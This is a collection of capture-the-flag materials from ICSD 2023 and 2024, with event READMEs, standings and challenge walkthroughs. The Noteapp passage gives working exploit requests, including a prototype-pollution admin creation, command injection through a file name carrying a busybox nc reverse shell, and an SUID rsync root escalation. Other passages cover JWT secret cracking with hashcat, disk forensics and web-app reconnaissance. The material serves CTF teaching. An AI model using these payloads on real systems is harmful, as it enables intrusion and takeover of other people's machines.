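const SecretCode = 'constructed-secret';

// Factory so each service instance has its own DefaultUser (the real app has
// one module-level object that Object.assign mutates on every request).
function makeVulnerableService() {
  const DefaultUser = { username: '', password: '' };
  return function CreateAdminUser(user) {
    // The page's check: an own "isAdmin" without the secret is rejected...
    if (user.isAdmin && user.SecretCode !== SecretCode) {
      return { status: 401, isAdmin: false };
    }
    // ...but Object.assign(DefaultUser, user) copies the body's own "__proto__"
    // key with [[Set]] semantics, which invokes the inherited __proto__ setter
    // and changes DefaultUser's prototype to {isAdmin: true}.
    const NewUser = Object.assign(DefaultUser, user);
    return { status: NewUser.isAdmin ? 201 : 401, isAdmin: !!NewUser.isAdmin };
  };
}

// Hardened: copy only allowlisted fields into a null-prototype object, and
// derive isAdmin from an own property plus the secret, never from the chain.
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
function safeCreateAdminUser(body) {
  const user = Object.create(null);
  for (const k of ['username', 'password']) {
    if (hasOwn(body, k) && typeof body[k] === 'string') user[k] = body[k];
  }
  const wantsAdmin = hasOwn(body, 'isAdmin') && body.isAdmin === true;
  user.isAdmin = wantsAdmin && body.SecretCode === SecretCode;
  return { status: user.isAdmin ? 201 : 401, isAdmin: user.isAdmin };
}

// Constructed request body in the walkthrough's shape. JSON.parse creates an
// own property literally named "__proto__"; it does not touch the prototype,
// so user.isAdmin is undefined and the SecretCode check above is skipped.
const polluted = JSON.parse(
  '{"username":"admin","password":"adminadmin","__proto__":{"isAdmin":true}}'
);

const vulnerable = makeVulnerableService();
console.log(vulnerable(polluted));                            // admin created
console.log(vulnerable({ username: 'bob', password: 'x' }));  // still admin: DefaultUser stays polluted
console.log(safeCreateAdminUser(polluted));                   // rejected
```

Note that swapping the arguments to `Object.assign({}, DefaultUser, user)` alone is not enough: the fresh target would still get its prototype replaced through the `__proto__` setter. Copying named fields into a `Object.create(null)` object avoids both the shared-state mutation and the setter.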
```http
PUT /update-user-note/..$'..$'admin$'create-admin-user%3F_method=POSt& HTTP/1.1
Host: noteapp.icsd:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 86
Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo

{
  "username": "admin",
  "password":"adminadmin",
  "__proto__": { "isAdmin":true
  }
}
```

![https://i.ibb.co/4T2Gdvm/Prototype-pollution-exploit.png](https://i.ibb.co/4T2Gdvm/Prototype-pollution-exploit.png)

Let’s log in as the newly created admin user.
```http
PUT /update-user-note/..$'..$'admin$'login-as-admin%3F_method=POST& HTTP/1.1
Host: noteapp.icsd:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 49
Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo

{
  "username": "admin",
  "password":"adminadmin"}
```

![https://i.ibb.co/d4svqbh/Login-As-Admin.png](https://i.ibb.co/d4svqbh/Login-As-Admin.png)

Now we are an admin user. The last step is to abuse the endpoints that are accessible to admin users.

![https://i.ibb.co/25wxJv7/Delete-Profile-Photo.png](https://i.ibb.co/25wxJv7/Delete-Profile-Photo.png)

The file name is passed to a shell command, so we can exploit this simply by sending a semicolon followed by the command that connects back to our listener.
```http
PUT /update-user-note/..$'..$'admin$'delete-profile-photo%3F_method=POST& HTTP/1.1
Host: noteapp.icsd:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 43
Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
X-Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbklkIjoiY2M3MWU5N2UtNWE3MC00MDQ0LThjMjUtYzFkODczNzM4NzMzIiwiaWF0IjoxNjk2Mjc1NzE2LCJleHAiOjE2OTYyNzkzMTZ9.pdR7ok7Xn-cU3YDZVperWvFTD9TNR789abKJ3QsmtBs

{
  "fileName": "random_file.jpg; whoami"
}
```

![https://i.ibb.co/pKcp8wN/delete-profile-whoami.png](https://i.ibb.co/pKcp8wN/delete-profile-whoami.png)

Using `busybox` instead of a direct `nc` command seems better opsec to me.
```http
PUT /update-user-note/..$'..$'admin$'delete-profile-photo%3F_method=POST& HTTP/1.1
Host: noteapp.icsd:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 79
Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
X-Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbklkIjoiY2M3MWU5N2UtNWE3MC00MDQ0LThjMjUtYzFkODczNzM4NzMzIiwiaWF0IjoxNjk2Mjc1NzE2LCJleHAiOjE2OTYyNzkzMTZ9.pdR7ok7Xn-cU3YDZVperWvFTD9TNR789abKJ3QsmtBs

{
  "fileName": "random_file.jpg; busybox nc 192.168.100.248 53 -e /bin/bash"
}
```

![https://i.ibb.co/GW4rP32/Shell-Generated.png](https://i.ibb.co/GW4rP32/Shell-Generated.png)

## Privilege Escalation

After successfully getting a reverse shell, we can go for privilege escalation.

```sh
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
```

![https://i.ibb.co/k11r9W8/findsuids.png](https://i.ibb.co/k11r9W8/findsuids.png)

The `rsync` command has the SUID bit set, so let's look it up in **[GTFOBins](https://gtfobins.github.io/)**. This command is enough to get an elevated shell.

```sh
rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null
```

![https://i.ibb.co/crXc6Mt/root-flag.png](https://i.ibb.co/crXc6Mt/root-flag.png)

Thank you for reading!!
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/README.md:
--------------------------------------------------------------------------------
Machine images can be installed from [this link](https://drive.google.com/drive/folders/1mJG_11NPdRdBOJevI7wx_VfH41mm01RS?usp=sharing).

--------------------------------------------------------------------------------
/Game Of Thrones/README.md:
--------------------------------------------------------------------------------
# 'Game of Thrones' - Capture the Flag

As PROSOL, we had the opportunity to host the ICSD 2023 conference, an event dedicated to cyber security days, for the third time! The event was co-hosted by PROSOL and the State Service for Special Communication and Information Security.

Within the framework of the event, which took place on September 21-23, 2023, a CTF competition in the "Game of Thrones" format was organized by the hosts. According to the event schedule, the competition took place on September 22 and lasted for 6 hours. Ten teams, each consisting of three members, competed for a prize pool totaling 3000 AZN plus additional exciting prizes.

CyberYashma emerged as the winner of the competition, scoring 220 out of 600 possible points. The second and third place teams (DoublePulsar and ALLSAFE) both achieved a score of 110.

In this repository, we will share all the materials that we used during the CTF to express our appreciation for open source. Moreover, to support this idea, we have used one easy machine from [vulnhub](https://www.vulnhub.com/entry/election-1,503/) (Callobes)!

# General Information
6 vulnerable machines were presented to competitors. Machines were categorized as easy, medium, and hard. Each easy machine provided 50 points, each medium machine 100 points, and each hard machine 150 points, adding up to a total of 600 points.
Moreover, competitors were able to access an ELK server where all HTTP logs, as well as every command run on the attack boxes, were logged (to read more, please refer to the [architecture section](https://github.com/icsd-ctf/ICSD/tree/master/Game%20Of%20Thrones/Architecture/Writeup.md)). This, in theory, should have helped teams find the exact ways other teams exploited the machines and redo the steps to obtain the flags. This way, teams with better overall offensive and defensive skills would come out on top.

> [!NOTE]
> In addition to the primary challenges, we introduced a secondary challenge: competitors were given the option to destroy the machines they had successfully exploited (for example, deleting important system files, blocking network access, etc.). However, there were consequences for this action.
> If other teams detected the destruction of a machine, they would be rewarded with an additional 50 points. On the other hand, the team that destroyed the machine would face a penalty of 20 points and a ban from accessing that specific machine.
> During the CTF, a couple of such incidents occurred where teams did damage the CTF machines. However, none were detected.


# Standings

| Teams/Machines | Callobes | Gitlab | Bytescribe | Captivity | Blitz | Noteapp | Total |
| :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: |
| CyberYashma | 20 30 | 20 30 | 30 30 - | 30 30 - | - - - - | - - - | 220 |
| DoublePulsar | 20 30 | - - | 30 30 - | - - - | - - - - | - - - | 110 |
| ALLSAFE | 20 30 | - - | 30 30 - | - - - | - - - - | - - - | 110 |
| CBAR_TEAM | 20 30 | 20 30 | - - - | - - - | - - - - | - - - | 100 |
| ExploitationUnit | 20 30 | 20 30 | - - - | - - - | - - - - | - - - | 50 |

Unfortunately, the other 5 teams scored 0 points.

During the competition, several hints were shared at random time intervals for each machine.
These hints even included credentials for the gitlab machine in the format root:base64(password) and 2 CVE numbers!

The fact that five teams were unable to score any points can be primarily attributed to their limited experience in CTF competitions. It's crucial to stress that this environment is simulated and can be quite challenging, not exactly mirroring real-world penetration testing experiences. Consequently, lower scores should not be seen as indicative of anyone's inability to perform penetration tests or blue teaming effectively.


# Some moments from the competition

![BAH_7833-min](https://github.com/icsd-ctf/ICSD/assets/147237916/df9af7f6-d4a5-44f6-9cca-9372b5b05eea)
___
![BAH_7813](https://github.com/icsd-ctf/ICSD/assets/147237916/3ff3b80e-477f-45a7-861c-466afbcf4e53)
___
![BAH_7830](https://github.com/icsd-ctf/ICSD/assets/147237916/8a920361-5c47-4d98-a204-261eb71f87c2)
___
![BAH_7822](https://github.com/icsd-ctf/ICSD/assets/147237916/0fe1dbe7-0f48-44a2-9f5f-0dfd4cc9e2cc)
___
![photo_5249282619873546109_y](https://github.com/icsd-ctf/ICSD/assets/147237916/cdd58273-ac0a-4e07-b1d3-224877e32813)
___
![photo_5249282619873546110_y](https://github.com/icsd-ctf/ICSD/assets/147237916/725f2e85-2bca-4b9d-bc92-a8a67c0c4a74)
___
![0W1A1434](https://github.com/icsd-ctf/ICSD/assets/147237916/67f58365-9e1b-4f9e-aa4a-f60b40757342)
___
![BAH_7814](https://github.com/icsd-ctf/ICSD/assets/147237916/e5794b09-4e51-4f2e-8d1e-77ca0c698f09)
___
![BAH_7820](https://github.com/icsd-ctf/ICSD/assets/147237916/a97a0654-4de7-4924-9405-19702406fd85)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# ICSD

In this repository, you will find materials from past CTF competitions held during ICSD (International Cyber Security Days) events.

Previously hosted events:
1. 2023 - 'Game of Thrones'
2. 2024 - 'Who Am I'
--------------------------------------------------------------------------------
/Who Am I/README.md:
--------------------------------------------------------------------------------
# 'Who Am I' - Capture the Flag

As part of the ICSD 2024 conference, we had the privilege of hosting the Capture the Flag (CTF) competition, Who Am I.

A total of 20 teams, each consisting of 2-3 participants, competed for a prize pool of 9,000 AZN, with 5,000 AZN awarded to the first-place team, 3,000 AZN to the second, and 1,000 AZN to the third. The competition took place on September 20th, running from 08:30 to 14:15, lasting nearly six hours.

_Boşver_ emerged as the winner, scoring 1,080 out of a possible 2,100 points. _BHOSploit_ claimed second place with 1,030 points, and _Kabiner_ secured third place with 800 points.

In this repository, we will share all the challenges used during the competition, along with what we consider to be the correct solutions. Additionally, we will provide statistics on the competitors, teams, and individual questions.

# General Information
## Challenges
A total of 12 challenges were presented to the competitors, each consisting of one or more questions, amounting to 31 questions in total.

Challenges covered various aspects of cybersecurity such as Cryptography, OSINT, Steganography, Log Analysis, Disk Forensics, Penetration Testing and Privilege Escalation. Each challenge was assigned a total score, which was distributed across the questions based on their difficulty level.


| Challenge Name | Difficulty | Challenge Score | Question Count | Score for each Question | Covers |
|---|---|---|---|---|---|
| **C1: Death Token** | Easy | 100 | 1 | 100 | Cryptography |
| **C1: Decode the Escape** | Easy | 100 | 1 | 100 | Cryptography |
| **C3: ANAIS_WATT3RSON** | Easy | 100 | 1 | 100 | OSINT |
| **C4: #exec cmd= “whoami”** | Easy | 125 | 4 | 25, 30, 30, 40 | Steganography, OSINT |
| **C5: Packet Detective** | Easy | 125 | 9 | 10, 10, 10, 10, 10, 15, 15, 20, 25 | Forensics, Packet Analysis |
| **C6: Exorcising Sukuna’s Curse** | Medium | 130 | 2 | 60, 70 | Vulnerability Exploitation |
| **C7: Root Reaper Quest** | Medium | 150 | 1 | 150 | Log Analysis |
| **C8: In Quest for Rogue Dragon** | Medium | 170 | 2 | 100, 70 | Reverse Engineering |
| **C9: End of Rumbling** | Hard | 200 | 2 | 100, 100 | Active Directory Exploitation |
| **C10: Shadows Possession Jutsu** | Hard | 250 | 3 | 100, 75, 75 | Forensics, Disk Analysis |
| **C11: Serial Escape** | Hard | 250 | 3 | 100, 100, 50 | Web Exploitation |
| **C12: Mr. Windoclin** | Hard | 300 | 2 | 150, 150 | Vulnerability Exploitation, Docker Escape |
| **Total** | | **2000** | **31** | | |

> [!NOTE]
> Some challenges may have included references to films or anime shows, but none required knowledge of them to be solved.

## Standings

> [!IMPORTANT]
> All flag submission attempts (whether correct or incorrect) have been logged and are available in the 'ctf_submission_logs.csv' file.

| N% | Team | C1 | C2 | C3 | C4 | C5 | C6 | C7 | C8 | C9 | C10 | C11 | C12 | Score | Extra | Total |
| :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: |
| 1 | boşver | 100 | - | 100 | 125 | 125 | 130 | 150 | - | - | - | 250 | - | 980 | 100 | 1080 |
| 2 | BHOSsploit | 100 | 100 | 100 | 125 | 125 | 130 | - | - | - | - | 100 | 150 | 930 | 100 | 1030 |
| 3 | Kaniber | 100 | - | 100 | 125 | 125 | - | 150 | - | - | - | 100 | - | 700 | 100 | 800 |
| 4 | SUDOERS | 100 | - | - | 85(+++-) | 100(+-+++-+++) | - | 150 | 100(+-) | - | 100(+--) | - | - | 635 | 100 | 735 |
| 5 | 405 Found | - | - | 100 | 125 | 125 | 130 | 150 | - | - | - | - | - | 630 | 100 | 730 |
| 6 | Felina | 100 | 100 | - | 125 | 125 | 130 | - | - | - | - | - | - | 580 | 100 | 680 |
| 7 | R3d3f3nd | 100 | - | 100 | 125 | 110(+++++-+++) | 130 | - | - | - | - | - | - | 565 | 100 | 665 |
| 8 | Zero Zero | - | - | - | 125 | 110(+++++-+++) | 130 | 150 | - | - | - | - | - | 515 | 100 | 615 |
| 9 | ASCCA | - | - | 100 | 125 | 110(+++++-+++) | - | 150 | - | - | - | - | - | 485 | 100 | 585 |
| 10 | Cerberus | - | - | 100 | 125 | 100(+-+++-+++) | 130 | - | - | - | - | - | - | 455 | 100 | 555 |
| 11 | CyberCell | 100 | - | - | 85(+++-) | 110(+++++-+++) | - | 150 | - | - | - | - | - | 445 | 100 | 545 |
| 12 | FR13NDS | 100 | - | - | 85(+++-) | 115(+-+++++++) | 130 | - | - | - | - | - | - | 430 | 100 | 530 |
| 13 | AzInfosec | - | - | - | 125 | 115(+-+++++++) | 130 | - | - | - | - | - | - | 370 | 100 | 470 |
| 14 | Iron First | - | - | - | 85(+++-) | 110(+++++-+++) | - | 150 | - | - | - | - | - | 345 | 100 | 445 |
| 15 | Cyberstars | 100 | - | - | 85(+++-) | 110(+++++-+++) | - | - | - | - | - | - | - | 295 | 100 | 395 |
| 16 | 127.0.0.Biz | - | - | - | 55(+-+-) | 115(+-+++++++) | - | - | - | - | - | - | - | 170 | 100 | 270 |
| 17 | Leet Duo | - | - | - | 85(+++-) | 20(+-+------) | - | - | - | - | - | - | - | 105 | 100 | 205 |
| 18 | Fourier | - | - | - | 85(+++-) | 10(+--------) | - | - | - | - | - | - | - | 95 | 0 | 95 |
| 19 | CyberSpace | - | - | - | 25(+---) | 10(+--------) | - | - | - | - | - | - | - | 35 | 0 | 35 |
| 20 | Overclock | - | - | - | - | - | - | - | - | - | - | - | - | 0 | 0 | 0 |

> [!NOTE]
> An extra 100 points were awarded for filling in a form about the PROCYBERLAB platform.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/README.md:
--------------------------------------------------------------------------------
**C1 - Death Token Challenge**

*The Death Token holds twisted truths. Your task is to reconstruct the token by correcting false information hidden in its payload. A mere correction brings you closer to restoring the true power of the token. Can you fix the lies and unlock the token's potential? (Ryuk says it needs to be in JWT format or next token will be named after you)*

Twisted JWT Token: *eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkZWF0aF90aW1lIjo1MTEyMDA3LCJuYW1lIjoiTCIsImtpbGxlciI6IllhZ2FtaSBMaWdodCIsInF1b3RlIjoiV2hhdCBkbyB5b3UgdGhpbmsgb2YgdGhhdCwgTD8gVGhpcyBpcyBteSBwZXJmZWN0IHZpY3RvcnkhIFRIQVQnUyBSSUdIVCwgSSBXSU4hISEhISEhISEiLCJzdGF0dXMiOiJhbGl2ZSJ9.2AUGVcRFfrZ75xL-3TBNcFuGDEkLTc73jsw0ZKWnKWs*

![image.png](images/image1.png)

--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/Writeup.md:
--------------------------------------------------------------------------------
# C1 - Death Token Challenge

In this challenge, we are tasked with correcting false data in a JWT token.
When we paste the token into jwt.io, we can see it contains information related to characters from the Death Note series:

![image.png](images/image2.png)

First, we cracked the JWT token using the following command:

`hashcat -a 0 -m 16500 jwt.txt rockyou.txt`

![image.png](images/image3.png)

As we can see, the key is "death". Now, addressing the false data issue—without even knowing the plot, we can spot something suspicious. The name of the character is "L", there is a killer named "Yagami Light", but the status says "alive"? That seems odd. A quick search confirms that Yagami indeed killed L. So, what we need to change in the payload is the status. We update "alive" to "death" (which makes sense, given the key is "death" too):

![image.png](images/image4.png)

And with that, we’ve created the correct token that Ryuk was after. He’s satisfied now, and he’s letting you go… or are you his next source of entertainment?

![image.png](images/image.jpg)
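To see what jwt.io and the re-signing step do underneath, here is an added Python example that is not part of the original writeup: it decodes a compact HS256 token, verifies the signature with a candidate secret in constant time, re-issues the token with corrected claims (the "fix the lies" step), and runs a weak-secret check over a small constructed wordlist, which is the same check `hashcat -m 16500` performs at scale against rockyou. It uses only the standard library; the sample payload and wordlist are constructed for the demo. Pointing `verify_hs256` at the challenge token with the recovered key `death` is the manual equivalent of the jwt.io signature check.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    # JWT base64url drops padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_unverified(token: str) -> tuple:
    """Split a compact JWT into (header, payload) without checking the signature,
    which is all jwt.io's decoder view does."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def sign_hs256(payload: dict, secret: str, header: Optional[dict] = None) -> str:
    """Build header.payload.signature with HMAC-SHA256 over the base64url signing input."""
    header = header or {"typ": "JWT", "alg": "HS256"}
    signing_input = ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(sig)}"


def verify_hs256(token: str, secret: str) -> bool:
    """Constant-time signature check; refuses anything that is not HS256 (alg 'none' etc.)."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
    except (ValueError, json.JSONDecodeError):
        return False
    if header.get("alg") != "HS256":
        return False
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig_b64))


def resign_with_fix(token: str, secret: str, changes: dict) -> str:
    """Re-issue the token with corrected claims, keeping the original header."""
    header, payload = decode_unverified(token)
    payload.update(changes)
    return sign_hs256(payload, secret, header)


def weak_secret_audit(token: str, wordlist) -> Optional[str]:
    """Defensive check: return the first candidate secret that verifies the token, else None."""
    for word in wordlist:
        if verify_hs256(token, word):
            return word
    return None
```

The lesson for anyone issuing HS256 tokens is in `weak_secret_audit`: a dictionary word as the signing key means anyone holding a token can recover the key offline and mint tokens with arbitrary claims, so the secret must be a long random value.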
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/README.md:
--------------------------------------------------------------------------------
**C10: Shadows Possession Jutsu**

*A hidden threat lurks in the network, moving like a shadow possession jutsu, silently altering systems. The attacker’s strategy mirrors Shikamaru’s genius—calculated, precise, and hard to trace. As a shinobi investigator, your mission is to uncover the faint trails left behind, crack the coded mysteries like deciphering enemy jutsu, and stop the threat before it spreads like the Akatsuki’s influence.
The fate of the network depends on your ability to outwit this unseen adversary—will you illuminate the shadows, or fall prey to their cunning?*

![image.png](images/image%2012.png)
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/Writeup.md:
--------------------------------------------------------------------------------
# C10 - Shadows Possession Jutsu:

When we start the machine, we notice several tools and a file available:

- **AccessData FTK Imager**: This tool is used for both acquiring and analyzing image files.
- **HxD**: A hex editor for editing a file's bytes.
- **icsd.001**: Upon examining the headers, we can identify that this is an NTFS file system image.

![image.png](images/image.png)

However, when we attempt to open the file in FTK Imager, it shows as an unrecognized file system. This could be caused by corrupted header and footer bytes.

![image.png](images/image%201.png)

Therefore, we open the file again in HxD and look at the header and footer bytes.

Looking up the expected header and footer bytes of an NTFS file system, we see that they should be:

- **Bytes 0x03–0x0A**: Signature "NTFS".
- The last 2 bytes of the MBR (first sector of NTFS) should be 55 AA.

After correcting these bytes with HxD, FTK Imager can identify and analyze the file system:

- [4] 85 → 54
- [510-511] 22 55 → 55 AA

![image.png](images/image%202.png)

After examining the recycle bin and the user desktop, we discovered a **password** and a **ZIP file**. The first assumption is that the password might be used to unlock the ZIP file.
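The two corrections above (byte 4 back to 0x54, the "T" of the `NTFS    ` OEM ID, and bytes 510-511 back to `55 AA`) can be checked programmatically before reaching for HxD. The Python below is an added example and not part of the original writeup: it validates the first sector of an image against those expected values, repairs them, and builds a constructed 512-byte sample carrying exactly the corruptions the challenge image had. `check_image_file` is the helper you would point at `icsd.001`; the function names are assumptions for the demo.

```python
NTFS_OEM_ID = b"NTFS    "      # 8 bytes at offsets 0x03..0x0A of the boot sector
BOOT_SIGNATURE = b"\x55\xAA"   # last two bytes of the 512-byte boot sector
SECTOR_SIZE = 512


def check_ntfs_boot_sector(sector: bytes) -> list:
    """Return (offset, found, expected) tuples for every byte that deviates from the
    NTFS OEM ID or the boot signature; an empty list means the sector looks sane."""
    if len(sector) < SECTOR_SIZE:
        raise ValueError("need at least one 512-byte sector")
    issues = []
    for i, expected in enumerate(NTFS_OEM_ID):
        off = 0x03 + i
        if sector[off] != expected:
            issues.append((off, sector[off], expected))
    for i, expected in enumerate(BOOT_SIGNATURE):
        off = 510 + i
        if sector[off] != expected:
            issues.append((off, sector[off], expected))
    return issues


def repair_ntfs_boot_sector(sector: bytes) -> bytes:
    """Write the expected OEM ID and boot signature back, leaving every other byte alone."""
    buf = bytearray(sector)
    buf[0x03:0x0B] = NTFS_OEM_ID
    buf[510:512] = BOOT_SIGNATURE
    return bytes(buf)


def make_constructed_sample() -> bytes:
    """Constructed boot sector reproducing the writeup's two corruptions:
    byte 4 = 0x85 (should be 0x54) and bytes 510-511 = 22 55 (should be 55 AA)."""
    buf = bytearray(SECTOR_SIZE)
    buf[0:3] = b"\xEB\x52\x90"                    # typical NTFS jump instruction
    buf[0x03:0x0B] = NTFS_OEM_ID
    buf[0x0B:0x0D] = (512).to_bytes(2, "little")  # bytes per sector in the BPB
    buf[510:512] = BOOT_SIGNATURE
    buf[4] = 0x85                                 # corruption 1
    buf[510:512] = b"\x22\x55"                    # corruption 2
    return bytes(buf)


def check_image_file(path: str) -> list:
    """Read the first sector of an image file (e.g. icsd.001) and report deviations."""
    with open(path, "rb") as fh:
        return check_ntfs_boot_sector(fh.read(SECTOR_SIZE))


if __name__ == "__main__":
    sample = make_constructed_sample()
    for off, found, expected in check_ntfs_boot_sector(sample):
        print(f"offset {off}: found {found:02X}, expected {expected:02X}")
    print("after repair:", check_ntfs_boot_sector(repair_ntfs_boot_sector(sample)))
```

The check deliberately covers only the two fields the writeup identifies; a deeper validator would also sanity-check the BPB (bytes per sector, sectors per cluster, MFT cluster number), which is what FTK Imager is really parsing when it accepts or rejects the image.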

![image.png](images/image%203.png)

![image.png](images/image%204.png)

The content of pw.txt is “hello123”.

And there is a txt file inside the ZIP file we found:

![image.png](images/image%205.png)

Let us extract and read the file with WinRAR so that we can supply the password.

![image.png](images/image%206.png)

The answer to the first question is “U2hpbWlzaGFv”.

2. The second question is “What malware is used for persistence?”.

Let's look at the registry autorun keys.

We need to look at “Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”.

In order to find that key we need to extract the “C:\Users\icsd\ntuser.dat*” files.

![image.png](images/image%207.png)

![image.png](images/image%208.png)

After viewing that registry key with “Registry Editor” we find the answer is “gh0st.exe”.

![image.png](images/image%209.png)

3. What is the name of the flash disk used to install the malware?

In order to find the inserted flash disks we need to look at the

“Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet001\Enum\USBSTOR”

registry key.

We need to extract the “C:\Windows\system32\config\SYSTEM*” files for that.

![image.png](images/image%2010.png)

![image.png](images/image%2011.png)

The answer is “SanDisk”.

To Sum Up

Questions:

1. What is the content of the data.zip? “U2hpbWlzaGFv”
2. What malware is used for persistence? “gh0st.exe”
3. What is the name of the flash disk used to install the malware?
“sandisk”
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/README.md:
--------------------------------------------------------------------------------
# Serial Escape

Exploit vulnerabilities in the web application, gain access to the underlying machine, and escalate your privileges to become the root user.

--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/Writeup.md:
--------------------------------------------------------------------------------
# Serial Escape

You can begin by running a basic NMAP scan on the target.

```bash
nmap -sV -v <target IP>
```

![image](./images/2024-09-25_17h30_17.png)

Based on the NMAP result, there are two open ports: SSH (22) and HTTP (80).
If you navigate to the target IP address in a browser you will see a page as follows.

![image](./images/2024-09-25_17h30_48.png)

Based on the error message, you can understand that the base URL "/" requires authentication to visit.

To discover directories on the web application, you can use a directory brute-forcing tool like FFUF. This revealed an additional directory named 'dev', which also requires authentication.

![image](./images/2024-09-25_17h29_25.png)

When you navigate to the registration page to create a new user, you will see that the form requires you to enter an email address ending with "@oracle.az" only.

![image](./images/2024-09-25_17h31_16.png)

Upon registering, the application sends an OTP code to the provided email for verification, ensuring that users cannot create accounts with fake email addresses. However, after further inspection, you can notice that the email validation (checking if it ends with '@oracle.az') is only performed on the client side.

![image](./images/2024-09-25_18h56_23.png)

You can complete the registration form with dummy data, capture the network traffic using Burp Suite, and modify the email field to use an address of your choice — either a personal email or a temporary/disposable one to receive the OTP and complete verification. For demonstration purposes, a temporary email was used.

https://temp-mail.org/

![image](./images/2024-09-25_17h36_49.png)

Once you have placed a valid email address you can forward the traffic, which will send an OTP to the provided address.

![image](./images/2024-09-25_17h38_46.png)

To complete the registration process, enter the OTP code and submit.

![image](./images/2024-09-25_17h39_16.png)
![image](./images/2024-09-25_17h39_31.png)

As a result, you will be redirected to the login page with a success message indicating that you have successfully created a new user.
Having a user on the web application, you can now log in. On the home page, you will see the first flag for the CTF.

![image](./images/2024-09-25_17h39_50.png)

Since you now have a valid user, you can visit the "dev" directory discovered earlier while directory brute-forcing with FFUF.
In the "dev" directory you will see two files: notes.txt and source.zip

![image](./images/2024-09-25_17h41_34.png)

The notes.txt file contains a message titled 'Security Alert,' highlighting a critical vulnerability in the application originating from a package called ```node-serialize```.
According to this message, you can understand that your next step will be downloading the source code of the web app (```/dev/source.zip```) and analyzing it to move the attack further.

![image](./images/2024-09-25_17h41_42.png)

